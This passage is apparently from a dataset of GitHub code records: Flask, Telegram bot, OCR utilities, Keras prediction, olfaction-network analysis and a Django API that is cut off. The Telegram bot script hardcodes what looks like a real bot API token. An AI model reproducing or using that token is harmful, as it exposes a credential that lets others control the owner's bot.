(?, ?)\",\n ('First Post', 'Content for the first post')\n )\ncur.execute(\"INSERT INTO posts (title, content) VALUES (?, ?)\",\n ('Second Post', 'Content for the second post')\n )\nconnection.commit()\nconnection.close()\n\ndef get_db_connection():\n conn = sqlite3.connect(db_path)\n conn.row_factory = sqlite3.Row\n return conn\n\n# for later\n@app.route(\"/\")\ndef index():\n conn = get_db_connection()\n posts = conn.execute('SELECT * FROM posts').fetchall()\n conn.close()\n return render_template('index.html', posts=posts)\n\n# for later use\n@app.route('/user/')\ndef show_user_profile(username):\n # show the user profile for that user\n return f'User {escape(username)}'","repo_name":"cathystanton/hackMIT22","sub_path":"backend/storeData.py","file_name":"storeData.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28821411796","text":"import logging\r\nfrom telegram.ext import Updater, CommandHandler\r\nimport youtube_dl\r\ndef start(update, context):\r\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Welcome! Please enter the YouTube video URL to download music.\")\r\ndef download_audio(update, context):\r\n url = update.message.text\r\n ydl_opts = {\r\n 'format': 'bestaudio/best',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n }\r\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\r\n info = ydl.extract_info(url, download=False)\r\n title = info['title']\r\n ydl.download([url])\r\n context.bot.send_message(chat_id=update.effective_chat.id, text=f\"Downloaded: {title}\")\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\nupdater = Updater(token='6054021931:AAHCMiCAdS5XJM4z2mPe1g0gVS7tOoWy6Uk', use_context=True)\r\ndispatcher = updater.dispatcher\r\nstart_handler = CommandHandler('start', start)\r\ndispatcher.add_handler(start_handler)\r\ndispatcher.add_handler(MessageHandler(Filters.text, download_audio))\r\nupdater.start_polling()\r\n\r\n","repo_name":"Mevdevoloper/YTDL","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5464757809","text":"from time import sleep\nfrom datetime import datetime\n\nSTART_DATE = datetime(2021, 7, 13)\nEND_DATE = datetime(2036, 7, 12, hour=23, minute=59, second=59)\nKMS = 11269\n\ntry:\n while True:\n SECONDS = (datetime.now() - START_DATE).total_seconds()\n MINUTES = (datetime.now() - START_DATE).total_seconds() / 60\n HOURS = (datetime.now() - START_DATE).total_seconds() / 60 / 60\n DAYS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24\n MONTHS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24 / 30.4375\n YEARS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24 / 365\n YEARS_LEFT = (END_DATE - datetime.now()).total_seconds() / 60 / 60 / 24 / 365\n TOTAL_KMS = KMS / YEARS * YEARS_LEFT + KMS\n try:\n print(f\"\"\" Seconds: {round(SECONDS)}, {round(KMS/SECONDS, 12):12.12f} \\\nMinutes: {round(MINUTES)}, {round(KMS/MINUTES, 10):10.10f} \\\nHours: {round(HOURS)}, {round(KMS/HOURS, 8):8.8f} \\\nDays:{round(DAYS)}, {round(KMS/DAYS, 7):7.7f} \\\nMonth: {round(MONTHS)}, {round(KMS/MONTHS, 5):5.5f} \\\nYear: {round(YEARS)}, {round(KMS/YEARS,4):4.4f} \\\nTotal KMs: {round(TOTAL_KMS, 1):6.1f}\"\"\", end=\"\\r\")\n except 
ZeroDivisionError:\n ...\n sleep(0.95)\nexcept KeyboardInterrupt:\n\tYEARS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24 / 365\n\tYEARS_LEFT = (END_DATE - datetime.now()).total_seconds() / 60 / 60 / 24 / 365\n\tTOTAL_KMS = KMS / YEARS * YEARS_LEFT + KMS\n\tprint(f\"\"\" Total KMs: {round(TOTAL_KMS, 1):6.1f} \"\"\", end=\"\\n\")\n","repo_name":"alvynabranches/bank_assignment","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34458952312","text":"import json\nimport os\nimport time\nimport re\nfrom functools import wraps\nfrom logging.handlers import RotatingFileHandler\n\nfrom pdf2image import convert_from_path\nfrom PIL import Image, ImageDraw, ImageFont\n\nimport logging\nfrom unidecode import unidecode\nimport datetime\nimport logging\n\nlog_format = \"%(asctime)s::%(levelname)s::%(name)s::\" \\\n \"%(filename)s::%(lineno)d::%(message)s\"\nlogger = logging.getLogger(__name__)\n\n# To override the default severity of logging\nlogger.setLevel('DEBUG')\n\n# Use FileHandler() to log to a file\nfile_handler = RotatingFileHandler(\"log/ocr_document.log\",\n # mode='a',\n maxBytes=5 * 1024 * 1024,\n backupCount=2,\n encoding=None)\nformatter = logging.Formatter(log_format)\nfile_handler.setFormatter(formatter)\n\n# Don't forget to add the file handler\nlogger.addHandler(file_handler)\n\n# Draw text box and text in image\ndef draw_result(dt_boxes, text_array, image, font_path):\n for index, box in enumerate(dt_boxes):\n box = np.array(box).astype(np.int32).reshape(-1, 2)\n cv2.polylines(image, [box], True, color=(255, 255, 0), thickness=1)\n\n # Convert to Image to draw text vietnamese\n image = Image.fromarray(image)\n img_new = image.copy()\n draw = ImageDraw.Draw(img_new)\n color = (0, 0, 255)\n # font_path = \"/home/tms/Documents/TaiDV/projects/ocr/ocr_framework/PaddleOCR/doc/fonts/latin.ttf\"\n # font_path = \"/usr/share/fonts/truetype/ubuntu-font-family/Ubuntu-B.ttf\"\n # font_path = \"/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\"\n\n for index, box in enumerate(dt_boxes):\n box = np.array(box).astype(np.int32).reshape(-1, 2)\n text = text_array[index]\n scale = 1 # this value can be from 0 to 1 (0,1] to change the size of the text relative to the image\n imageWidth = max((box[1][0] - box[0][0]), (box[2][0] - box[3][0]))\n imageHeight = max((box[3][1] - box[0][1]), (box[2][1] - box[1][1]))\n fontScale = min(imageWidth, imageHeight) / (1.5 / scale)\n font = ImageFont.truetype(font_path, int(fontScale), encoding='utf-8')\n if index == 0:\n box[3][0] = 0\n draw.text((box[3][0], box[3][1]), text, fill=color, font=font)\n\n img_new = Image.blend(image, img_new, 0.5)\n return np.array(img_new)\n\n\n# Crop image form textbox\ndef crop_image(image, point):\n top_left_x = int(min([point[0][0], point[1][0], point[2][0], point[3][0]]))\n top_left_y = int(min([point[0][1], point[1][1], point[2][1], point[3][1]]))\n bot_right_x = int(max([point[0][0], point[1][0], point[2][0], point[3][0]]))\n bot_right_y = int(max([point[0][1], point[1][1], point[2][1], point[3][1]]))\n\n return image[max(top_left_y - int((bot_right_y - top_left_y) / 7), 0): \\\n max(bot_right_y + int((bot_right_y - top_left_y) / 7), 0), \\\n top_left_x: bot_right_x]\n\n\ndef timeit(func):\n @wraps(func)\n def timeit_wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n total_time = end_time - 
start_time\n logger.info(f'Function {func.__name__}{args} {kwargs} Took {total_time:.4f} seconds')\n return result\n\n return timeit_wrapper\n\n\n# Load image from file (jpg, pdf)\ndef load_array_image_from_file(path_file):\n filename = os.path.split(path_file)[-1]\n filename_split = filename.split(\".\")\n # check file pdf and retrive first page\n if filename_split[-1] == \"pdf\":\n images = convert_from_path(path_file)\n if len(images) == 0:\n logger.info(\"Error in loading pdf: {}\".format(path_file))\n image = images[0]\n image = np.array(image)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n else: # image\n image = cv2.imread(path_file)\n if image is None:\n logger.info(\"Error in loading image: {}\".format(path_file))\n else:\n logger.info(\"Loaded image: {}\".format(path_file))\n\n return image\n\n\ndef save_image_postprocess(result_boxes, result_array_text, image,\n path_font_show, path_file, path_folder_output):\n image_drawed = draw_result(result_boxes, result_array_text,\n image, path_font_show)\n filename = os.path.split(path_file)[-1]\n filename_split = filename.split(\".\")\n if filename_split[-1] == \"pdf\":\n filename_split[-1] = \"jpg\"\n filename = \".\".join(filename_split)\n path_file = os.path.join(path_folder_output,\n \"processed_{}\".format(filename))\n cv2.imwrite(path_file, image_drawed)\n logger.info(\"The visualized image saved in {}\".format(path_file))\n\n\n# Find answer for text box based on check question in position right on a line\ndef check_line_answer_right(list_text_sorted, list_box_sorted, index):\n list_text = []\n list_box = []\n # Select 2 text box top_left_y sorted above and bottom\n y_min = min(list_box_sorted[index][i][1] for i in range(4))\n y_max = max(list_box_sorted[index][i][1] for i in range(4))\n len_list_text = len(list_text_sorted)\n if index > 2 and index < (len_list_text - 2):\n index_check = [index - 2, index - 1, index + 1, index + 2]\n for i in index_check:\n # Check point between [y_min, y_max]\n box_temp = list_box_sorted[i]\n y_between = (min(box_temp[i][1] for i in range(4)) +\n max(box_temp[i][1] for i in range(4))) / 2\n\n if y_between < y_max and y_between > y_min:\n list_text.append(list_text_sorted[i])\n list_box.append(list_box_sorted[i])\n\n return list_text, list_box\n else:\n return [], []\n\n\n# import the necessary packages\nimport numpy as np\nimport cv2\n\n\ndef margin_pst(point):\n # top_left_x = int(min([point[0][0], point[1][0], point[2][0], point[3][0]]))\n top_left_y = int(min([point[0][1], point[1][1], point[2][1], point[3][1]]))\n # bot_right_x = int(max([point[0][0], point[1][0], point[2][0], point[3][0]]))\n bot_right_y = int(max([point[0][1], point[1][1], point[2][1], point[3][1]]))\n\n margin = int((bot_right_y - top_left_y) / 7)\n point[0][0] = point[0][0] - margin\n point[0][1] = point[0][1] - margin\n point[1][0] = point[1][0] + margin\n point[1][1] = point[1][1] - margin\n point[2][0] = point[2][0] + margin\n point[2][1] = point[2][1] + margin\n point[3][0] = point[3][0] - margin\n point[3][1] = point[3][1] + margin\n\n return point\n\n\ndef order_points(pts):\n # initialzie a list of coordinates that will be ordered\n # such that the first entry in the list is the top-left,\n # the second entry is the top-right, the third is the\n # bottom-right, and the fourth is the bottom-left\n rect = np.zeros((4, 2), dtype=\"float32\")\n # the top-left point will have the smallest sum, whereas\n # the bottom-right point will have the largest sum\n s = pts.sum(axis=1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = 
pts[np.argmax(s)]\n # now, compute the difference between the points, the\n # top-right point will have the smallest difference,\n # whereas the bottom-left will have the largest difference\n diff = np.diff(pts, axis=1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n # return the ordered coordinates\n return rect\n\n\ndef four_point_transform(image, pts):\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype=\"float32\")\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n # return the warped image\n return warped\n\n\ndef read_json(file_path):\n with open(file_path, \"r\") as f:\n return json.load(f)\n\n\ndef rotate_image(image, result_boxes):\n # Find index line with maximum width\n width_max = 0\n index_width_max = None\n for index, box in enumerate(result_boxes):\n left_top_point = box[0]\n right_bottom_point = box[2]\n\n width_temp = right_bottom_point[0] - left_top_point[0]\n if width_temp > width_max:\n width_max = width_temp\n index_width_max = index\n\n if index_width_max == None:\n logger.info(\"Error value of result_boxes\")\n return image\n\n else:\n angle = cv2.minAreaRect(result_boxes[index_width_max])[-1]\n if angle < 45:\n angle = angle\n else:\n angle = angle - 90\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated_image = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC,\n borderMode=cv2.BORDER_REPLICATE)\n return rotated_image\n\n\ndef rotate_image(image, result_boxes):\n # Find index line with maximum width\n width_max = 0\n index_width_max = None\n for index, box in enumerate(result_boxes):\n left_top_point = box[0]\n right_bottom_point = box[2]\n width_temp = right_bottom_point[0] - left_top_point[0]\n if width_temp > width_max:\n width_max = width_temp\n index_width_max = index\n if index_width_max == None:\n logger.info(\"Error value of result_boxes\")\n return image, None\n else:\n angle = cv2.minAreaRect(result_boxes[index_width_max])[-1]\n if angle < 45:\n angle = angle\n else:\n angle = angle - 90\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated_image = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC,\n 
borderMode=cv2.BORDER_REPLICATE)\n return rotated_image, angle\n\n\ndef matching_box(result_boxes, result_texts, index_title, image):\n result_boxes_sorted = []\n result_texts_sorted = []\n (height, width, _) = image.shape\n for index, box in enumerate(result_boxes):\n left_top_point = box[0]\n left_bottom_point = box[3]\n\n # Match box have index title > 2\n if index < index_title + 2:\n result_texts_sorted.append(result_texts[index])\n result_boxes_sorted.append(result_boxes[index])\n continue\n # Match box have index title > 2 and smaller len box because full stack\n if left_top_point[0] < width / 4 and index < len(result_boxes) - 2:\n y_start_line = left_top_point[1]\n y_end_line = left_bottom_point[1]\n # Select 2 box above and 2 box below\n index_check = [index - 2, index - 1, index + 1, index + 2]\n box_ok = [] # box satisfy\n text_ok = [] # text satisfy\n for i in index_check:\n y_between = (min(result_boxes[i][j][1] for j in range(4)) +\n max(result_boxes[i][j][1] for j in range(4))) / 2\n if y_between < y_end_line and y_between > y_start_line:\n box_ok.append(result_boxes[i])\n text_ok.append(result_texts[i])\n # No box satisfy\n if len(box_ok) == 0:\n result_texts_sorted.append(result_texts[index])\n result_boxes_sorted.append(result_boxes[index])\n continue\n # 1 box satisfy\n elif len(box_ok) == 1:\n if box_ok[0][0][0] >= left_top_point[0]: # Element first in list box_ok\n text_link = result_texts[index] + \" \" + text_ok[0]\n result_texts_sorted.append(text_link)\n else:\n result_texts_sorted.append(result_texts[index])\n # result_boxes_sorted.append(result_boxes[index])\n continue\n # Multi box satisfy -> select box nearest with box processing\n else:\n index_box = None\n distance_min = 10000\n for index_box_temp, box in enumerate(box_ok):\n temp = box[0][0] - left_top_point[0]\n if (temp > 0) and (temp < distance_min) and (box[0][0] < width / 4 * 3):\n distance_min = temp\n index_box = index_box_temp\n\n # Exist box satisfy distance min\n if index_box != None:\n text_link = result_texts[index] + \" \" + text_ok[index_box]\n result_texts_sorted.append(text_link)\n # No Exist box satisfy\n else:\n result_texts_sorted.append(result_texts[index])\n else:\n result_texts_sorted.append(result_texts[index])\n\n return result_texts_sorted\n\ndef recognize_text(result_boxes, image, recognize):\n # Recognize image -> text in ever text_box\n result_texts = []\n for index, point in enumerate(result_boxes):\n point = margin_pst(point)\n # Transform for text not tilted\n image_ocr = four_point_transform(image, point)\n image_ocr = cv2.cvtColor(image_ocr, cv2.COLOR_BGR2RGB)\n image_ocr = Image.fromarray(image_ocr)\n result_text = recognize.predict(image_ocr)\n result_texts.append(result_text)\n\n # Reverse of texts, boxes\n result_texts.reverse()\n result_boxes = result_boxes[::-1]\n\n return result_texts, result_boxes\n\ndef recognize_text_title(result_boxes, image, recognize,\n list_title_contracts, list_config_contracts):\n # Recognize image -> text in ever text_box\n result_texts = []\n for index, point in enumerate(result_boxes[::-1]):\n point = margin_pst(point)\n # Transform for text not tilted\n image_ocr = four_point_transform(image, point)\n image_ocr = cv2.cvtColor(image_ocr, cv2.COLOR_BGR2RGB)\n image_ocr = Image.fromarray(image_ocr)\n result_text = recognize.predict(image_ocr)\n # Because result_text is title:\n # Check length of line > 50 and\n # count character upper in this line < len(character in line) /2\n # -> page not first page\n len_result_text = len(result_text)\n if 
len_result_text > 50 and count_upper(result_text) < (len_result_text / 2):\n return False\n text_box_lower_unidecode = unidecode(result_text)\n for index_contract, title in enumerate(list_title_contracts):\n # Replace character special = \"\", because detect . , ...\n # Case detect missing character special will error\n text_box_lower_unidecode = re.sub('[^A-Za-z0-9& ]+', '',\n text_box_lower_unidecode)\n if re.search(text_box_lower_unidecode, title, re.IGNORECASE) != None and \\\n len(text_box_lower_unidecode) > (len(title) / 4 * 3):\n logger.info(text_box_lower_unidecode)\n return True\n return False\n\ndef replace_spell(text_test):\n words = [\n \n ]\n\n for word in words:\n word_lower_unidecode = unidecode(word.lower())\n result_search = re.search(word_lower_unidecode, unidecode(text_test), re.IGNORECASE)\n if result_search is not None:\n (start_point, end_point) = result_search.span()\n text_test = text_test.replace(text_test[start_point:end_point], word)\n\n return text_test\n\n\ndef count_upper(str):\n # upper, lower, number, special = 0, 0, 0, 0\n upper = 0\n for i in range(len(str)):\n if str[i].isupper():\n upper += 1\n # elif str[i].islower():\n # lower += 1\n # elif str[i].isdigit():\n # number += 1\n # else:\n # special += 1\n\n return upper\n\ndef timeit(func):\n @wraps(func)\n def timeit_wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n total_time = end_time - start_time\n print(f'Function {func.__name__}{args} {kwargs} Took {total_time:.4f} seconds')\n return result\n return timeit_wrapper\n\n","repo_name":"wolfghost9989/ExtractPDF","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28236594946","text":"import csv\n\nfrom cnn.keras.models.d3H_avg.model import build_model\nfrom cnn.keras.prediction.predict_generator import predict_generator\nfrom cnn.keras.d3.preprocessing.image_processing import inputs\nfrom cnn.keras.d3.preprocessing.predict_generator import target_size, GRID\nfrom cnn.keras.d3.train import _split_scans, classes\n\n\nbatch_size = 64\nnum_samples = 481 * len(GRID)\npath_weights = '/home/mhubrich/checkpoints/adni/d3H_avg_3/weights.193-loss_0.363-acc_0.849.h5'\n\n\ndef predict():\n # Get inputs for labeling\n _, scans_test = _split_scans()\n test_inputs = inputs(scans_test, target_size, batch_size, classes, 'test', seed=None)\n\n # Set up the model\n model = build_model(num_classes=len(classes), input_shape=(1,)+target_size)\n model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\n model.load_weights(path_weights)\n\n # Start labeling\n pred, filenames = predict_generator(model,\n test_inputs,\n val_samples=num_samples,\n max_q_size=256,\n nb_preprocessing_threads=2)\n\n return pred, filenames\n\n\ndef write_submission(predictions, filenames):\n with open('predictions_d3H_avg_3_193-0_36_4.csv', 'wb') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for i in xrange(0, len(predictions)):\n tmp = [filenames[i]]\n for p in predictions[i]:\n tmp.append(p)\n writer.writerow(tmp)\n print('%d predicitons written.' 
% (len(predictions)))\n\n\nif __name__ == \"__main__\":\n predictions, filenames = predict()\n write_submission(predictions, filenames)\n\n","repo_name":"mhubrich/adni-python","sub_path":"cnn/keras/prediction/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25853096324","text":"print(\" *** Divisible number *** \")\nx= int(input(\"Enter a positive number : \"))\nif x == 0 :\n print(\"0 is OUT of range !!!\")\nelif x != 0 :\n list = []\n for i in range(1, x + 1):\n if x % i == 0:\n list.append(i)\n str = ' '.join(map(str, list))\n long = len(list)\n print(\"Output ==> \"+str)\n print(\"Total ==>\",long)\n","repo_name":"PcrPz/OOD","sub_path":"Week_12_Pratice/12_2_Python.py","file_name":"12_2_Python.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10659357544","text":"import sys\npath = '/data.nst/arana/olfaction_circuitry/'\nif path not in sys.path:\n sys.path.insert(1, path)\nfrom classes import *\nfrom plotting import *\nfrom odor_input import *\nfrom utils import *\n\n## Parameters of the run\n## Odors maxed, ORN and Neurons as measured\nn_odor = 34\nn_ORN = 21\nn_neuron = 56\nn_train_odor_repeats = 500 ## need 500 to learn fully generally\nn_test_odor_repeats = 50 ## each odor presented x times\npresentation_length = 1000 #ms\ndt = 0.5 #ms\nn_train_odors = n_train_odor_repeats*n_odor ## total odors trained\nodor_log_interval = 50\nfolder_name = path + \"simulations/220725\"\nproject_name = \"meas_comp_samuel2019\"\nodor_file = path + 'odor_data/samuel2019_-4_raw.csv'\n\n## Define the settings dictionary from the standard one\ns = Settings()\ns.set('presentation_length', presentation_length) ## ms here since default dt is 1\ns.set('fade_fraction', 0.2)\ns.set('input_tau_inc', 50)\ns.set('rho', 0.001)\ns.set('dt', dt)\ns.set('n_odors', n_odor)\ns.set('n_ORN', n_ORN)\ns.set('n_stim', n_ORN)\ns.set('n_neuron', n_neuron)\ns.set('folder_name', \"'%s'\" % folder_name)\ns.set('project_name', \"'%s'\" % project_name)\ns.set('dynamic_log_interval', s.presentation_length*odor_log_interval)\ns.set('dynamic_sample_interval', 5)\ns.set('dynamic_log_test_set', n_odor*2)\ns.set('n_train_repeat', n_train_odor_repeats)\ns.set('n_test_repeat', n_test_odor_repeats)\n## Since presentation length increased 10-fold, need to also change learning rates to decrease 10+-fold\ns.input_selector = get_odor_rate\ns.odor_file = odor_file\ns.MBON_settings_dict = {\"c\": 10, \"learning_rate\": 0.000001}\ns.set('update_interval', presentation_length*n_odor*5) ## for biases - needs to be at least as long as odor presentation time * num odors\ns.plasticity = Analytic_Simple()\n\nlog_file = folder_name+\"/\"+project_name + \"_log\"\nwith gzip.open(log_file, 'r') as f:\n log = pickle.load(f)\nassert isinstance(log, Log)\nfinal_time = max(log.snapshots.keys())\nfinal_snap = log.snapshots[final_time]\ns = final_snap[\"s\"]\nprint(\"Odors Trained on:\", int(final_time/s.presentation_length))\n\nnet = SomaticNet(s)\nnet.feedforward_weights = final_snap[\"feedforward_weights\"]\nnet.recurrent_weights = final_snap[\"recurrent_weights\"]\nnet.neuron_biases = final_snap[\"biases\"]\nnet.decoder_matrix = final_snap[\"decoder\"]\n\nmeas_file = path + \"connectivity_data/PN_KC_Meas.csv\"\n\nmeas = read_meas_connectivity(meas_file, s)\nmeas_input_corr = compute_PN_input_correlations(meas, 
s)\nprint(\"Measured input correlations: \", meas_input_corr)\n\nmeas_io_corr = compute_input_output_correlations(meas, s)\nprint(\"Measured input output correlations: \", meas_io_corr)\n\nopt_map, opt_mse = map_sim_to_meas_connectivity(net, meas, s)\nprint(\"Optimum mapping: \", opt_map)\nprint(\"Optimum MSE: \", opt_mse, np.mean(opt_mse))\n## Plot MSE here\nopt_input_corr = compute_PN_input_correlations(net.feedforward_weights, s)\nprint(\"Optimum input correlations: \", opt_input_corr)\n\nopt_io_corr = compute_input_output_correlations(net.feedforward_weights, s)\nprint(\"Optimum input output correlations: \", opt_io_corr)\n\n\nrandom = SomaticNet(s)\nlog_file = folder_name+\"/\"+project_name + \"_random\" + \"_log\"\nwith gzip.open(log_file, 'r') as f:\n log = pickle.load(f)\nassert isinstance(log, Log)\nfinal_time = max(log.snapshots.keys())\nfinal_snap = log.snapshots[final_time]\ns = final_snap[\"s\"]\nprint(\"Odors Trained on:\", int(final_time/s.presentation_length))\nrandom.feedforward_weights = final_snap[\"feedforward_weights\"]\nrandom.recurrent_weights = final_snap[\"recurrent_weights\"]\nrandom.neuron_biases = final_snap[\"biases\"]\nrandom.decoder_matrix = final_snap[\"decoder\"]\n\n\nran_map, ran_mse = map_sim_to_meas_connectivity(random, meas, s)\nprint(\"Random mapping: \", ran_map)\nprint(\"Random MSE: \", ran_mse, np.mean(ran_mse))\n\nran_input_corr = compute_PN_input_correlations(random.feedforward_weights, s)\nprint(\"Random input correlations: \", ran_input_corr)\n\nran_io_corr = compute_input_output_correlations(random.feedforward_weights, s)\nprint(\"Random input output correlations: \", ran_io_corr)\n## One idea for classification: reward function from odor to [-1, 1]; use NN with one output node to classify this; single metric\n## But original idea is have a 110 layer output function with softmax for interpretation; densify these connections and learn\n## Could do sparsity as you can do L1 adaptation as db = r_1 - 0.1;\n## TODO:\n## Random network by doing probabilistic version of nature paper; could also do binary and see what happens\n## 5. Pruning: Do the derivation for Laplace multiplier sparsity constraint leading to different weight decay trick\n## 6. Finish compensatory variability paper and check if we see these correlations or not in our learned network\n## 8. Andre's data as starting feedforward, do other metrics\n## Do param search on rho to find best one?\n## Try with spikes added instead of plain rates\n## Try on original dataset\n\n## 50 neurons, 50 + 20 odors\n## Implement plot where train classifier with different amounts of training data (same epochs to converge) and see learning rate\n\n## Parameters to add to plot:\n## 1. Input data: dataset, n_odor, n_ORN\n## 2. Network: n_neuron, rho, train size, test size, plasticity, learning rates\n## 3. Input dynamics: shape of profile, presentation length, stim_on_frac\n\n## Compute MSE between overlap of model and experiment neuron connectivity for random and model:\n# - Look at each optimized KC and find the best match in measured. 
Then, compute MSE totally and check against random.\n## Correlations between PNs inputting to singular KC to average correlation weight for random, model and data; we'd expect this is high\n## Run the network on the measured feedforward weights instead and see what happens for classification\n\n## To do thresholding, can set relu threshold and see when the reconstruction fails and find that threshold; then fix F and train \n## Then sparse connectivity can do find PNs with nonzero weights, and find average (weighted by product of weights?) of pairwise correlations of firing rates over different odors\n## Newer paper has non-random PN-KC connectivity - see if you can reproduce that result\n\n## Our network better works with more vs less frequent odors\n## But generalizes worse with new odors\n\n\n\n## Concentration to PN noise data: 4 data points from Olsen 2010 & also 19 stimuli for 3 concentrations in Hallem & Carlson\n## Fig 3 from Hallem & Carlson 2006 for 4 ORNs shows no obvious pattern in concentration-ORN - diff for each odor.\n## Fig 4, Table S2 has 24 ORNs for 10 pure, 9 fruit odors - no clear pattern here too, so heuristic seems wise to do the\n## std dev of inverse tuning curve as concentration proxy FILL PAPER HERE\n## At low concentrations of 1e-8, generally only 1 or 2 odors responded even for the broadly tuned receptors","repo_name":"agastya-rana/olfaction-circuitry","sub_path":"code/connectivity_comparison.py","file_name":"connectivity_comparison.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21417654769","text":"import math\nimport json\nimport logging\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta\n\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import permission_classes\n\nfrom .models import (\n Challenge,\n ChallengeSchedule,\n ChallengeCompletionEntry\n)\nfrom .serializers import (\n ChallengeSerializer,\n ChallengeScheduleSerializer,\n ChallengeCompletionEntrySerializer\n)\n\nlogger = logging.getLogger('django')\n\n\nclass ChallengeListApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, *args, **kwargs):\n challenges = Challenge.objects.all()\n serializer = ChallengeSerializer(challenges, many=True)\n logger.info('Retrieved %s challenge entries', len(serializer.data))\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @permission_classes([IsAuthenticated])\n def post(self, request, *args, **kwargs):\n data = {\n 'title': request.data.get('title'),\n 'start_date': datetime.strptime(request.data.get('start_date').split('T')[0], '%Y-%m-%d').date(),\n 'end_date': datetime.strptime(request.data.get('end_date').split('T')[0], '%Y-%m-%d').date()\n }\n serializer = ChallengeSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ChallengeApiView(APIView):\n def get_object(self, challenge_id):\n try:\n return Challenge.objects.get(challenge_id=challenge_id)\n except Challenge.DoesNotExist:\n return None\n\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n 
challenge_instance = self.get_object(challenge_id)\n if not challenge_instance:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n serializer = ChallengeSerializer(challenge_instance)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @permission_classes([IsAuthenticated])\n def put(self, request, challenge_id, *args, **kwargs):\n challenge_instance = self.get_object(challenge_id)\n if not challenge_instance:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n data = {\n 'title': request.data.get('title'),\n 'start_date': datetime.strptime(request.data.get('start_date').split('T')[0], '%Y-%m-%d').date(),\n 'end_date': datetime.strptime(request.data.get('end_date').split('T')[0], '%Y-%m-%d').date()\n }\n serializer = ChallengeSerializer(instance=challenge_instance, data=data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @permission_classes([IsAuthenticated])\n def 